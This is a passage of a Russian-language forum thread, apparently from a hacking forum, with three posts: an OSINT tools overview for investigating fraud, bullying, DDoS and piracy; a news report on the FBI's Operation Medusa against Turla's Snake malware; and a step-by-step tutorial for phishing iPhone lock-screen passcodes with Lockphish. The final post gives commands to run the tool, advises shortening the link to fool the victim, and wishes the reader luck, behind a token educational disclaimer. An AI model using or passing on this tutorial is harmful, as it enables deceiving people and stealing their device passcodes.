Интернет-мошенничество может принимать различные формы, включая поддельные интернет-магазины, махинации с инвестициями и т.д. Прежде всего, при расследовании онлайн-мошенничества разведчики могут использовать OSINT для анализа веб-сайтов, профилей в социальных сетях. Точно так же они могут выявлять поддельные веб-сайты и профили и анализировать финансовые транзакции на предмет подозрительной активности, используя такие инструменты, как:
  1. FraudRecord: платформа для отслеживания мошенников.
  2. Scamadviser: инструмент для проверки репутации сайтов и интернет-продавцов.
  3. Trustpilot: платформа для проверки рейтинга компаний.
Интернет-буллинг





Онлайн-буллинг может принимать различные формы, включая сообщения с угрозами, нежелательные контакты и доксинг. Анализируя онлайн-активность злоумышленника, профили в социальных сетях и каналы связи с помощью OSINT можно отследить преследователя и остановить буллинг. Для поиска личной информации злоумышленника и анализа его онлайн-активности пригодятся инструменты:
  1. Поиск Google: найдите онлайн-профили, сообщения или изображения, связанные с преследователем.
  2. Social Catfish: поиск учетных записей людей в социальных сетях по электронной почте, номеру телефона или имени пользователя.
  3. Tineye: инструмент обратного поиска изображений, чтобы найти, где еще в Интернете было размещено изображение.
  4. StalkScan: инструмент для сбора информации о страницах на Facebook.
  5. Maltego: инструмент интеллектуального анализа для визуализации взаимосвязей между данными, который может помочь определить связи между преследователем и жертвой.
Атаки типа «отказ в обслуживании» (DDoS)





DDoS-атака — это разновидность кибератаки, при которой злоумышленники используют сеть скомпрометированных устройств, чтобы перегрузить целевой сервер или сеть. Для расследования DDoS-атак используйте следующие инструменты:
  1. Shodan: поисковая система для устройств, подключенных к Интернету, может определять потенциальные цели DDoS-атак.
  2. DDoS Map: карта DDoS-атак в реальном времени, происходящих по всему миру.
  3. NetFlow Analyzer: этот инструмент может отслеживать сетевой трафик и выявлять потенциальные DDoS-атаки.
  4. Wireshark: анализатор сетевых протоколов может внализировать трафик, указывающий на DDoS-атаку.
  5. Black Lotus Labs: платформа для анализа угроз, которая предоставляет информацию о DDoS-атаках и других киберугрозах.
Кража интеллектуальной собственности и пиратство




Пиратство - кража защищенных авторским правом или запатентованных материалов и интеллектуальной собственности. Пользователи могут использовать ниже указанные инструменты для выявления пиратского контента:
  1. Оповещения Google: инструмент для отслеживания в Интернете упоминаний определенных ключевых слов, включая названия брендов или продуктов. Может быть полезно для выявления случаев нарушения прав на товарный знак или авторских прав.
  2. TinEye: Инструмент обратного поиска картинок позволяет пользователям выявлять случаи кражи изображений, загружая их или вводя URL-адрес.
  3. Инструменты для борьбы с пиратством: существует несколько инструментов для борьбы с пиратством, позволяющих отслеживать и блокировать незаконные загрузки материалов, защищенных авторским правом. Например, DMCA.com и Copyright Alliance.
Заключение

OSINT играет важную роль в расследовании киберпреступлений, включая фишинговые атаки, онлайн-мошенничество, кражу личных данных, атаки вредоносных программ и многое другое. Используя вышеуказанные инструменты и методы, пользователи могут собирать и анализировать данные из различных онлайн-источников. Таким образом, при правильном подходе и грамотном использовании инструментов OSINT-расследования могут смягчить или даже предотвратить негативные последствия киберугроз.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат
По данным властей США, ФБР уничтожило вредоносное ПО, известное как Snake, которое использовалось в кибершпионаже российской службой безопасности ФСБ. Как это произошло, узнаем в нашей статье.
Чиновники ФБР запустили операцию «Медуза», в ходе которой было выявлено и обезврежено вредоносное ПО, нацеленное на огромное количество американских компьютеров. Вредоносное ПО считалось «главным инструментом шпионажа». Между тем ответственные российские хакеры, известные как группа Turla, были названы одними из самых опытных в этом направлении.
Что произошло

Власти США заявили, что ФБР саботировало набор вредоносных программ, используемых элитными российскими шпионами, что все больше пролило свет на цифровое перетягивание каната между двумя кибер-сверхдержавами.
Высокопоставленные сотрудники правоохранительных органов заявили, что технические эксперты ФБР выявили и обезвредили вредоносное ПО, используемое российской службой безопасности ФСБ, против нераскрытого числа американских компьютеров. Они надеялись, что этот шаг нанесет смертельный удар одной из ведущих российских программ кибершпионажа.
«Мы оцениваем это как их главный инструмент шпионажа», — сказал журналистам один из официальных лиц США перед публикацией. Он сказал, что Вашингтон надеется, что операция «уничтожит страну с виртуального поля боя».





Кто за этим стоит

Чиновник сказал, что шпионы ФСБ, стоящие за вредоносной программой, известной как Snake, являются частью печально известной хакерской группы Turla.
По словам высокопоставленного сотрудника ФБР, группа в течение двух десятилетий активно действовала против различных целей, связанных с НАТО, правительственных учреждений США и технологических компаний.
Российские дипломаты не сразу ответили на сообщение с просьбой прокомментировать ситуацию. Москва регулярно отрицает проведение операций кибершпионажа.
Официальные лица США поговорили с журналистами перед выпуском новостей при условии, что их имена не будут названы. Аналогичные заявления, раскрывающие усилия ФСБ по киберподрыву, были сделаны службами безопасности Великобритании, Канады, Австралии и Новой Зеландии.
Turla считается одной из самых опытных хакерских команд, изученных сообществом исследователей безопасности.
«Они оставались в тени, сосредоточившись на скрытности и оперативной безопасности», — сказал Джон Халтквист, вице-президент по анализу угроз в американской компании по кибербезопасности Mandiant. «Они — одна из самых сложных целей, которые у нас есть».





Как удалось обезвредить ПО

Правительство США назвало уничтожение вредоносного ПО Turla Snake «Операция Медуза». ФБР и его партнеры определили, где в Интернете был развернут хакерский инструмент, и создали уникальную программную «полезную нагрузку», чтобы нарушить хакерскую инфраструктуру.
ФБР полагалось на существующие органы, выдающие ордера на обыск, для удаленного доступа к российской вредоносной программе в сетях жертв в США и разъединения ее соединений.
Высокопоставленный сотрудник ФБР сказал, что инструмент был разработан специально для связи с российской шпионской программой. «Он говорит на языке Snake и общается с помощью пользовательских протоколов Snake, не получая доступа к личным файлам жертвы», сказал чиновник.





__________________
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
Фишинг с Lockphish: как взломать пароль на iPhone






Вступить в наш чат​

IOS по праву считается самой защищенной мобильной операционной системой. А взлом пароля iPhone — один из самых востребованных запросов в поисковике, который интересует всех пользователей. Что ж, сегодня мы покажем вам один простой и неординарный способ взломать iPhone с помощью инструмента Lockphish.





Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.

Как работает взлом:

Для этого взлома мы будем использовать инструмент Lockphish и социальную инженерии. Мы отправим вредоносную ссылку, открыв её, жертва попадет на фишинговую страницу, которая будет выглядеть точно так же, как экран блокировки iPhone. Когда жертва разблокирует экран с помощью своего пароля, он будет перехвачен, и мы получим доступ к паролю. Жертва посчитает, что просто случайно заблокировала экран, хотя на самом деле это был взлом.

Как разблокировать iPhone с помощью Lockphish:
Шаг 1: Клонируйте Lockphish на свой Kali Linux с помощью следующей команды:

git clone [Only registered and activated users can see links. ]





Шаг 2: Теперь измените каталог на папку, как показано ниже:

cd lockphish





Шаг 3: Теперь запустите lock phish:

bash lockphish.sh

Шаг 4: Нажмите Enter, чтобы использовать ссылку YouTube по умолчанию, или укажите ссылку, на которую вы хотите перенаправить жертву, как показано ниже:





Шаг 5: Нажмите Enter, и вредоносная ссылка будет создана автоматически.





Шаг 6: Отправьте эту ссылку жертве. Вы также можете использовать инструмент сокращения URL-адресов, чтобы он не выглядел подозрительным.

Шаг 7: Жертва увидит обычный экран блокировки. Когда она введет пароль на поддельной странице, он будет отправлен вам.

Поздравляем! Теперь у вас есть доступ к паролю экрана блокировки жертвы.
Заключение:

Таким образом, в сегодняшней статье мы узнали, как можно использовать инструмент Lockphish для взлома пароля iPhone. Безусловно, этот метод требует определенных навыков социальной инженерии, но при правильном подходе и соблюдении всех шагов, вы сможете успешно выполнить взлом. На этом все. Удачи!
 
Сверху Снизу